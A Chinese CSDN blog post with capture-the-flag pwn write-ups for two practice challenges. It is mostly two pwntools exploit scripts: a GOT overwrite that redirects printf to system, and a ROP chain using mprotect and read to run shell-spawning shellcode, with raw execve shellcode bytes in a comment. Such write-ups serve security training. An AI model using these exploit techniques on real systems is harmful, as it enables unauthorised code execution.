[BJDCTF 2nd]secret&&inndy_rop

最新推荐文章于 2023-05-16 09:25:49 发布
最新推荐文章于 2023-05-16 09:25:49 发布
阅读量515 收藏 1
点赞数 1
分类专栏: pwn 文章标签: secret inndy_rop
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43833642/article/details/107459527
版权

[BJDCTF 2nd]secret

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
exp

from pwn import *

context.log_level = 'debug'

def debug_pause():
    log.info(proc.pidof(p))
    pause()

proc_name = './secret'
p = process(proc_name)
# p = remote('node3.buuoj.cn', 28831)                                                                      
elf = ELF(proc_name)
printf_got = elf.got['printf']
payload = b'/bin/sh'.ljust(0x10, b'\x00') + p32(printf_got)
p.sendafter('name?', payload)

secrets = [0x476B, 0x2D38, 0x4540, 0x3E77, 0x3162, 0x3F7D, 0x357A, 0x3CF5, 0x2F9E, 0x41EA, 0x48D8, 0x2763, 0x474C, 0x3809, 0x2E63] 
for secret in secrets:
    p.sendafter('Secret: ', str(secret))
p.sendafter('Secret:', str(999))
p.interactive()

在这里插入图片描述

inndy_rop

exp

from pwn import *

context.log_level = 'debug'

def debug_pause():
    log.info(proc.pidof(p))
    pause()

proc_name = './rop'
p = process(proc_name)
# p = remote('node3.buuoj.cn', 28801)
elf = ELF(proc_name)
mprotect_addr = elf.sym['mprotect']
bss_start = elf.bss() & ~(elf.bss()% (4 * 1024))
bss_size = 0x100
bss_per = 0x7 # 0b111
pop3ret = 0x08062d2b
read_addr = elf.sym['read']
payload = b'a' * (0xc + 0x4) + p32(mprotect_addr) + p32(pop3ret) + p32(bss_start) + p32(bss_size) + p32(bss_per) + p32(read_addr) + p32(bss_start) + p32(0x0) + p32(bss_start) + p32(bss_size)
p.sendline(payload)
# shellcode = b'\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
# p.send(shellcode)                                                                                      
p.send(asm(shellcraft.sh()))
p.interactive()

在这里插入图片描述

、moddemod
关注
专栏目录
hackme.inndy.tw的rop题目
10-15
hackme.inndy.tw的rop题目,如果那个网站被墙或者关闭的话可以从这里下载
inndy_rop
m0sway的博客
11-30 618
inndy_rop 使用checksec查看: 开启了栈不可执行,看题目,rop。 拉进IDA中看吧: 堆栈不平衡,不能看伪代码,不过没事,代码简单。 调用了一个overflow函数。跟进去查看: 一个gets()函数,溢出简单明了。 这题是一道静态编译的题目,所以不存在libc的调用了。 可以使用ROPgadget --binary inndy_rop --ropchain找到可以一键getshell的rop片段组合。 再加上偏移,即可。 exp: from pwn import * #start
BUUCTF pwn——inndy_rop
最新发布
CNS-Enterprise BCC-1701-J
05-16 244
BUUCTF 做题练习
rop-sample.rar_.comrop_rop_rop源码下载_taobao netty
09-20
ROP技术解析与Netty应用实战》 ROP(Return-Oriented Programming,返回导向编程)是一种高级的利用技术,常用于安全领域,特别是在软件漏洞利用中。ROP允许攻击者通过跳转到现有代码片段(通常称为“gadgets”)...
arm64_rop_exploit:Arm64返回定向编程(ROP)漏洞
03-02
arm64_rop_exploit arm64 rop小工具二进制文件,用于将arm64反向外壳程序代码映射到内存中并执行代码这仅适用于目标arm64设备。 用于将rop小工具映射到内存中并从libc库执行shell代码的源代码。 在运行Ubuntu 18.04....
STM8_Unlock_Flash_ROP_issue_ROPCLEAR_unlock_stm8s003_stm8s103_
10-03
在STM8S103型号中,涉及到的"Unlock Flash ROP issue"指的是在编程或擦除闪存时可能遇到的问题,尤其是与Read-Out Protection (ROP)功能有关的障碍。ROP是一种安全特性,它防止未经许可的读取和复制微控制器内部的...
hackme.inndy.tw的rop2题目
10-15
这是https://hackme.inndy.tw/scoreboard/的rop2题目如果网站被墙或者关闭请从这里下载
[BUUCTF]PWN——inndy_rop
mcmuyanga的博客
11-26 1363
inndy_rop 附件 步骤: 例行检查,32位,开启了nx保护 本地调试运行没看出个啥,直接上ida,一开始f5会报错, 找到报错提示的位置,点击option–>general调出如图的界面,勾选上stack pointar 看到堆栈不平衡,选中报错地址的上一行,右击,点击“change stack"跳出如图界面,在sp值前加个”–“即可 然后就能f5反编译了,main里就一个overflow函数,存在溢出漏洞 右边的函数列表里只有静态编译的结果,所以这题没法去泄露libc什么的 这
BUUCTF-PWN-inndy_rop
Rt1Text的博客
03-05 362
可以栈溢出,没有system函数,使用系统调用利用ROPgadget的功能直接利用程序中的片段拼凑rop链。
[BUUCTF-pwn]——inndy_rop
Y_peak的博客
03-18 365
[BUUCTF-pwn]——inndy_rop main函数无法反汇编,不过还好,里面的overflow就是gets函数,可以栈溢出。 因为懒得自己去构造rop链了,看看里面是否可以拼凑出系统的调用 里面有就省的我们自己写了 中间还找了半天错,我真是个笨蛋,以前一直用p 忘记和和构造系统调用的变量重复了,改为a就好了 exploit from pwn import * from struct import pack a = remote('node3.buuoj.cn',27139) # Padding
buuctf pwn (inndy_rop)(cmcc_simplerop)([ZJCTF 2019]Login)
cainiao78777的博客
04-18 274
由于buuctf好多pwn题目都是一个类型的,所以就把不同的,学到东西的题目,记录一下。
[BUUCTF]PWN——[BJDCTF 2nd]secret
mcmuyanga的博客
12-09 163
[BJDCTF 2nd]secret 附件 步骤: 例行检查,64位程序,开启了canary和nx 本地试运行一下,看看程序大概的情况,好像是一个什么游戏 64位ida载入,检索程序里的字符串,发现了flag字样 双击,ctrl+x找到了函数 sub_46A3F(),游戏开始界面,让我们输入名字 sub_40136D()函数太长了,没法f5 看汇编,看到首先调用了sub_46A329函数,在sub_46A329里读入了一个数据,off_46D090-1,然后跟标记处的数据比较,如果正确的话,就跳
BUUCTF--pwn--inndy_rop【ret2syscall】
qq_73149934的博客
12-24 306
BUUCTF--pwn--inndy_rop
BUUCTF(pwn)[BJDCTF 2nd]secret
半岛铁盒的博客
04-10 175
感觉这道题技巧性比较强 有两次输入 一次名字,一次 密码 先进 46A3AF 这里有一次输入 name 看一下 0x40136D的汇编 这里每次有一次 调用 0x46A329,并且 有一次cmp比较; 那么进入 0x46a329 进去看看0x401301 发现 printf_plt 的位置 与 system的位置相差0x10即16 我们可以一开始输入name的时候输入bin/sh; 把0x46d090覆盖为printf_plt, 经过16次输入比较, 前15次输入对的,最后一次输入错
buuctf-pwn-inndy_rop-wp
xuaohu123的博客
01-08 337
buuctf-pwn-innd_rop 查看文件保护 32位程序,开启了nx保护。
[BUUCTF]inndy_rop 杂谈、32位与64位系统调用、与思考
Tokameine的博客
09-07 560
总之先从题目开始看吧,是一道非常简单但却让我长见识的题...... int overflow() { char v1[12]; // [esp+Ch] [ebp-Ch] BYREF return gets(v1); } 明显的栈溢出,且程序基本没有特别的保护,正常构造rop链即可拿到shell 主要是想拓展一下系统调用与一个简单的获取ROP方法 ROPgadget --binary rop --ropchain ROP chain...
CTF-Pwn-[BJDCTF 2nd]secret
归子莫的博客
05-06 1497
CTF-Pwn-[BJDCTF 2nd]secret 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]secret 下载题目文件 secret 思路 老规矩使用file...
picoctf_2018_rop chain
03-16
picoctf_2018_rop chain是一道CTF比赛中的题目,需要使用ROP(Return Oriented Programming)技术来解决。ROP是一种利用程序中已有的代码段(称为gadget)来构造攻击代码的技术,通过将多个gadget串联起来,可以实现...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值